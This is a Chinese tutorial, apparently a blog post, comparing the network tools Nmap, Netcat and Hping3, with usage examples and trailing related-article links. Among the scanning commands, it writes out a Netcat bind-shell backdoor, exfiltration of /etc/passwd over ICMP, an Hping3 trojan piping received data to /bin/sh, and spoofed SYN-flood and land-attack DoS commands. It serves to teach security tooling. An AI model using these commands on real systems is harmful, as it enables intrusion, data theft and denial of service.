在网络安全领域，Nmap、Netcat、Hping3都是安全工程师必备的工具。Nmap主要作为端口扫描器，侦查目标机的端口及服务状态；而Netcat则整合了网络中各种常用功能（如后门、文件传输、端口扫描、端口转发等等），能辅助完成丰富的操作；Hping3主要作为特定的TCPIP数据包产生与解析的工具，当然也可用于Ping操作。

1 Nmap

核心应用：搜集基本信息

1.1 Nmap简介

　　Nmap是目前业界最为知名、最为强大的端口扫描器。它是由Fyodor创建的开源软件，在1997年首次发布。十多年来，Nmap开发团队一直不停地对其维护、更新，并规划开发新的功能。Nmap在安全领域内非常流行，像渗透工具Metasploit、漏洞扫描工具openVAS等工具都内置了Nmap，而漏洞扫描工具Nessus也支持导入Nmap扫描结果。

　　Nmap是主要用于基本的信息的搜集，包括主机活动状态、主机端口开放状况、应用服务及版本、操作系统与设备类型等等。另外Nmap完全支持IPv6；而Nmap脚本引擎（NSE）结合内置的丰富的Lua脚本让其支持的功能更加全面、更加精细（如提供丰富的HTTP相关的扫描脚本）。

1.2 Nmap功能

　　Nmap功能用法非常简单，这里简要回顾一下：

1.2.1 主机发现

nmap -sn -T4 targetip

1.2.2 端口扫描

nmap -T4 -s[scan method] -p[portrange] targetip

1.2.3 服务与版本侦测

nmap -T4 -sV targetip

1.2.4 操作系统扫描

nmap -T4 -O targetip

1.3 简单示例

（扫描目标机的端口与OS类型）：

详细使用方法参考：http://blog.csdn.net/aspirationflow/article/details/7694274

2 Netcat

核心应用：完成网络中各种辅助操作，被称作TCPIP的瑞士军刀

2.1 Netcat简介

　　Netcat用于从TCP/UDP连接中读取或发送网络数据。cat是Linux中查看或连接文件的命令，所以netcat本意为从网络上查看文件内容。而Netcat的作者Hobbit为它添加了非常丰富的功能，使它几乎能够完成网络操作中各式各样的操作，所以Netcat在网络安全领域被称作“TCPIP的瑞士军刀”（"Swiss-army knife forTCP/IP"）。

　　Netcat稳定版1.10由Hobbit在1996年3月发布（开源软件），之后作者没有再对其进行维护，但该工具十多年来依然在被广泛地使用，而且基于Netcat的各种衍生工具也层出不穷，他们在很多方面增强或扩展了Netcat的功能。

　　Nmap团队开发了Ncat作为Netcat的升级版本，增加了更多的功能，让其更能适应现代网络环境的需求。

2.2 Netcat功能

2.2.1 网络连接

　　类似于Telnet的功能，使用Netcat能够简便地登录到目标机上开放的端口。

　　例如，

nc mail.server.net 25

　　向mail.server.net的25号TCP端口发起连接。

2.2.2 端口扫描

　　Netcat同样可以进行端口扫描，但与Nmap相比，它的性能及使用范围都很有限。如果只想简单地探测几个端口的开放状态，使用Netcat也可行。

　　端口扫描格式如下：

nc –v –z hostnameport[s]

　　实例：

nc –v –z www.yahoo.com 80 22

　　扫描yahoo网站的80、22端口，判断其是否开放。

2.2.3 文件传输

　　Netcat最初的用途就是文件传输，它可以像Cat命令一样将读取的文件重定向到网络上的另外的文件。Netcat在网络应用中既可以当做服务器端，开启本机一个监听端口，也可以作为客户端向其他服务器端口发起连接。所以，文件传输，即是在两端分别运行Netcat。

　　在接受端，运行Netcat开启端口监听服务。

nc –L –p 4444 >receivedfile.zip

　　此处-L启动监听模式（即作为服务器端），开启4444端口，将接受到的数据写入到文件somefile.zip中。

　　而在发送端，只需连接该服务器端开放的端口，并选择需要发送的文件。

nc 192.168.1.43 4444< testfile.zip

　　使用<符号输入testfile.zip文件，并向目标机的4444端口发起连接。在建立连接成功后，发送端会将文件传送到接收端，接受端将收到的数据写入receivedfile.zip文件。整个过程，比较类似于cat命令，因为具体的网络传输过程由Netcat负责。

2.2.4 开启后门

　　Netcat甚至也可以用作后门程序。如果用户已经侵入到一台计算机，那么让该计算机在开机后（或其他条件下）自动启动Netcat，打开指定的端口，等待用户连接，在连接成功后执行特定程序（如cmd.exe，以便远程执行命令）。

nc –L –p 4444 –e cmd.exe

　　以监听模式启动Netcat，开启TCP端口4444，在与客户端成功建立连接后，执行cmd.exe程序（-e cmd.exe，此处为用户打开命令行执行窗口，用户可以通过命令操作此计算机）。

　　在客户端，直接连接目标机的4444端口即可。

nc 192.168.1.43 4444

　　连接后，客户端可以接收到一个命令行窗口。

2.2.5 端口转发

　　端口转发（PortForwarding）也是Netcat比较实用的用法。先将Netcat作为服务器接收其他主机的连接，然后将连接的数据转发另外的目标机端口。

　　比如：

mkfifo backpipe

nc -l 12345 0<backpipe | nc www.google.com 801>backpipe

　　比如，此处开启端口12345，作为www.google.com的代理。其他无法直接登陆google的用户可以通过此代理端口来与google进行交互。这里创建了一个fifo，是为实现双向数据通讯，因为管道运算符本身是单向的。

2.2.6 标语提取

　　标语提取（BannerGrabbing）的含义是抓取应用程序在建立连接后打印的标语提示信息，例如建立FTP连接后，FTP服务器可能打印出提示信息：FTP xxx.xxx等数据。

　　所以，根据服务器打印的信息，有时可以推断出对方服务程序的详细版本。这也是Nmap进行服务与版本侦测采用方法。

　　例如，首先创建一份文件，包含以下文本：

HEAD / HTTP/1.0
<return>
<return>

　　然后，将此文件发送到目标服务器的80端口，诱发对方发送HTTP首部数据。

cat file>nc -vv -w 2 www.cnn.com 80 >output.txt

　　然后可从output.txt查看到对方的发送的HEAD的标语信息。

2.2.7 其他功能

　　Netcat其他常用的功能：

支持完全的DNS转发、逆向检查
支持用户指定源端口
支持用户指定源端IP地址
内置宽松源路由能力（loosesource-routing capability）
慢速发送模式，可指定每隔多少秒发送一行文本
将发送或接收数据以16进制格式导出

3 Hping3

核心应用：灵活地构建TCPIP数据包

3.1 Hping3介绍

　　Hping是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是Hping3，支持使用tcl脚本自动化地调用其API。Hping是安全审计、防火墙测试等工作的标配工具。

　　Hping优势在于能够定制数据包的各个部分，因此用户可以灵活对目标机进行细致地探测。

　　而Nmap团队也开发了一款类似的工具Nping，集成在Nmap的安装包中。

3.2 Hping3功能

　　Hping3主要有以下典型功能应用：

3.2.1 防火墙测试

　　使用Hping3指定各种数据包字段，依次对防火墙进行详细测试。请参考：http://0daysecurity.com/articles/hping3_examples.html

　　测试防火墙对ICMP包的反应、是否支持Traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。

　　例如，以LandAttack方式测试目标防火墙（Land Attack是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接）。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

3.2.2 端口扫描

　　Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。

　　以下示例可用于探测目标机的80端口是否开放：

hping3 -I eth0 -S 192.168.10.1 -p 80

　　其中-Ieth0指定使用eth0端口，-S指定TCP包的标志位SYN，-p 80指定探测的目的端口。

　　hping3支持非常丰富的端口探测方式，Nmap拥有的扫描方式hping3几乎都支持（除开connect方式，因为Hping3仅发送与接收包，不会维护连接，所以不支持connect方式探测）。而且Hping3能够对发送的探测进行更加精细的控制，方便用户微调探测结果。

　　当然，Hping3的端口扫描性能及综合处理能力，无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。

3.2.3 Idle扫描

　　Idle扫描（Idle Scanning）是一种匿名扫描远程主机的方式，该方式也是有Hping3的作者Salvatore Sanfilippo发明的，目前Idle扫描在Nmap中也有实现。

　　该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。

3.2.4 拒绝服务攻击

　　使用Hping3可以很方便构建拒绝服务攻击。

　　比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用1000微秒的间隔发送各个SYN包。

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

　　其他攻击如smurf、teardrop、land attack等也很容易构建出来。

3.2.5 文件传输

　　Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。

　　实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。

　　在接收端开启服务：

hping3 192.168.1.159--listen signature --safe --icmp

　　监听ICMP包中的签名，根据签名解析出文件内容。

　　在发送端使用签名打包的ICMP包发送文件：

hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd

　　将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节（-d 100），发送签名为signature(-sign signature)。

3.2.6 木马功能

　　如果Hping3能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与Netcat的后门功能类似。

　　示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。

　　在木马启动端：

hping3 192.168.10.66--listen signature --safe --udp -p 53 |/bin/sh

　　在远程控制端：

echo ls >test.cmd

hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd

　　将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。

　　当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。

Nmap/Netcat/Hping3工具对比相关推荐

netstat/nmap/netcat用法
这三款工具是网络安全利器,做一个简单摘要,以备参考. netcat--网安瑞士军刀 netcat可以用于监控/扫描网络端口,它应用最多的情况是后门程序. 一般分两个步骤: 步骤一: 我们在被攻击的机器 ...
“诸神之眼”——Nmap端口扫描工具使用小手册
"诸神之眼"--Nmap端口扫描工具使用小手册 1.Nmap介绍 1.1.Nmap简介 Nmap ("Network Mapper(网络映射器)") 是一款开放 ...
cmd打开nmap_诸神之眼：Nmap端口扫描工具使用小手册——学生会私房菜【20190524期】...
菜系:安全技术分享主厨:国科(福州)学生会教学部--王荣昌.李志超 1 Nmap介绍 1.1 Nmap 简介 1) Nmap ("Network Mapper(网络映射器)") ...
Linux centos7 NMAP网络探测工具安装过程以及使用示例！
NMAP网络探测工具 1.nmap安装 RZ上传! 解压: tar jxvf nmap-7.60.tar.bz2 配置: ./configure 出现了一个小火龙! 编译: make 再安装gcc-c ...
爬虫学习 pyspider和scrapy小结 / 与其他工具对比
从火车头了解了翻页与正则表达式带入了爬虫原理.后python的urllib和requests彻底梳理了爬虫过程,之后引入phantomjs chromedriver这些彻底解决了爬虫问题,但是这些太琐 ...
【原创】BI解决方案选型之ETL数据整合工具对比
[原创]BI解决方案选型之ETL数据整合工具对比参考文章: (1)[原创]BI解决方案选型之ETL数据整合工具对比 (2)https://www.cnblogs.com/xiongnanbin/p/ ...
NMAP分布式扫描工具dnmap
NMAP分布式扫描工具dnmap NMAP是一款知名的网络扫描工具.它提供丰富和强大的网络扫描功能.但很多时候,需要渗透测试人员从多个终端发起扫描任务,以快速扫描大型网络,或规避IP限制等安全策略.而 ...
npm run buil构建后页面白屏_从Npm Script到Webpack，6种常见的前端构建工具对比
从Npm Script到Webpack,6种常见的前端构建工具对比小编说:历史上先后出现了一系列构建工具,它们各有优缺点.由于前端工程师很熟悉JavaScript,Node.js又可以胜任所有构建需 ...
【Windows 逆向】OD 调试器工具 ( OD 工具简介 | OD 工具与 CE 工具对比 )
文章目录一.OD 工具简介二.OD 工具与 CE 工具对比三.博客资源一.OD 工具简介 OD 全程是 PLLYDBG , 动态追踪工具 , 是目前最流行的调试解密工具 ; 该工具支持插件 ...

Nmap/Netcat/Hping3工具对比